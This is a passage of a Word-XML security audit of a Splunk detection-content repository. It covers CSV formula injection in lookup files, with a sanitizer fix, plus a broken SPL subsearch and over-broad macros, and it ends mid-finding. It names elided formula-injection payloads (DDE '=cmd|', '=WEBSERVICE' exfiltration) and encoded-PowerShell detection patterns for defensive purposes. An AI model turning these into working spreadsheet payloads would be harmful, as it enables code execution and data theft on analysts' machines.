    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/scripting_tools_user_agents.csv:42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (quoted leading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/windows_suspicious_tasks.csv:13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-encodedCommand *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-enc *</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/char_conversion_matrix.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows 11,45,47,63,64,66,258 contain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as data (by design — ASCII/base64 conversion table).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Several lookup CSV cells begin with a character that spreadsheet applications (Excel, LibreOffice Calc, Google Sheets) treat as a formula lead-in: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, tab, or carriage return (CWE-1236). If an operator opens a lookup CSV — or exports lookup contents / search results that echo these values — directly in a spreadsheet, a cell like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-encodedCommand *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is parsed as a formula. The dangerous historical consequence is DDE/formula execution (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=cmd|...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=HYPERLINK(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, data exfiltration via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=WEBSERVICE(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). In this repo the values are benign IOC strings, so the realistic risk is only if these values were ever re-exported to CSV and opened in Excel; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>char_conversion_matrix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entries are intentional table data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The cells are repo-controlled today (not attacker-written). The injection is realized only when the CSV/export is opened in a spreadsheet by a human. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires spreadsheet export + open; low integrity impact to the analyst's workstation context).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC (sanitization demonstration, safe, local):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A sanitizer that prefixes a single quote to any cell matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^[=+\-@\t\r]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> neutralizes formula interpretation while preserving display. Pseudocode of the fix applied to a copy (never to the repo, which is read-only):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import csv, re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>DANGEROUS = re.compile(r'^[=+\-@\t\r]')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def sanitize(cell):</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return ("'" + cell) if DANGEROUS.match(cell) else cell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># read copy -&gt; map sanitize over every cell -&gt; write sanitized copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Opening the sanitized copy in Excel shows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'-enc *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the literal text </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-enc *</w:t>
      </w:r>
      <w:r>
        <w:t>, not a formula.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation (full fix + explanation):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Do not mutate the shipped lookups (they are Splunk data, where the leading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is legitimate content and Splunk does not evaluate it). Instead apply formula-injection defenses at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>export boundary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: any tooling/dashboard that exports lookup or result CSVs for spreadsheet consumption must prefix a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or wrap/quote) cells beginning with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>= + - @ TAB CR</w:t>
      </w:r>
      <w:r>
        <w:t>, per OWASP CSV-injection guidance. Document that operators should import lookup CSVs as text, not double-click them into Excel. Explanation: the vulnerability lives in the consumer (spreadsheet), so the control belongs at export/handoff, not in the Splunk-side data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). OWASP — "CSV Injection" (Testing Guide); A03:2021 Injection family. ASVS v4 5.3.x output encoding. ATT&amp;CK T1059 (if formula spawns a shell via DDE). NIST 800-53 Rev5 SI-10, SC-18. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28. SANS/CERT: CERT output-encoding. Best practice: OWASP CSV Injection prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1236 Improper Neutralization of Formula Elements in a CSV File. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SC-18 Mobile Code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-03 — Logic defect: missing leading pipe in remove_valid_domains subsearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Not exploitable (correctness).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macros/remove_valid_domains.yml:8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 0.0 (availability/correctness defect, not a security-exploitable sink) — informational-security, functional impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros/remove_valid_domains.yml:8</w:t>
      </w:r>
      <w:r>
        <w:t>. Excerpt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>8    definition: 'eval domain=trim(domain,"*") | search NOT[| inputlookup domains]  NOT[ |inputlookup cim_corporate_email_domain_lookup] NOT[inputlookup cim_corporate_web_domain_lookup] | eval domain="*"+domain+"*"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The third subsearch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[inputlookup cim_corporate_web_domain_lookup]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is missing the leading pipe (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[| inputlookup ...]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). In SPL a subsearch that does not begin with a generating command is interpreted as a raw search over the current index/pipeline rather than running the lookup, so the corporate-web-domain exclusion silently fails to filter. This macro feeds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>baselines/dnstwist_domain_names.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| outputlookup brandMonitoring_lookup</w:t>
      </w:r>
      <w:r>
        <w:t>, so the brand-monitoring baseline can retain domains that should have been excluded (false positives / polluted lookup state).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No external input reaches this; it is author-controlled content. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (correctness/data-quality defect).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Static analysis of the SPL; the first two subsearches use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| inputlookup</w:t>
      </w:r>
      <w:r>
        <w:t>, the third omits it, so the three are not syntactically parallel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>definition: 'eval domain=trim(domain,"*") | search NOT [| inputlookup domains] NOT [| inputlookup cim_corporate_email_domain_lookup] NOT [| inputlookup cim_corporate_web_domain_lookup] | eval domain="*"+domain+"*"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Add the leading pipe so all three subsearches run as generating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands. Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[| inputlookup X]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns the lookup rows for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exclusion; without the pipe the bracket is a search filter and the exclusion is a no-op.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-670 (Always-Incorrect Control Flow Implementation) / CWE-480 (improper operator) analog. OWASP — N/A (not a web injection). ASVS v4 — N/A. NIST 800-53 Rev5 SA-11 (Developer Testing). NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28. SANS/CERT: correctness review. Best practice: Splunk subsearch syntax (generating commands require leading pipe).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-670. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-04 — Over-broad placeholder filter macros (search *) and permissive shipped allow-lists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Detection-efficacy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macros/potential_password_in_username_false_positive_reduction.yml:8; macros/deprecated/prohibited_softwares.yml; macros/base64decode.yml:8; kube_allowed_*, aws_ecr_users*, excluded_cloud_binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A (defense-in-depth / content-governance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location (representative):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros/potential_password_in_username_false_positive_reduction.yml:8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>definition: search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros/deprecated/prohibited_softwares.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>macros/base64decode.yml:8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$b64in$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interpolated unquoted into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
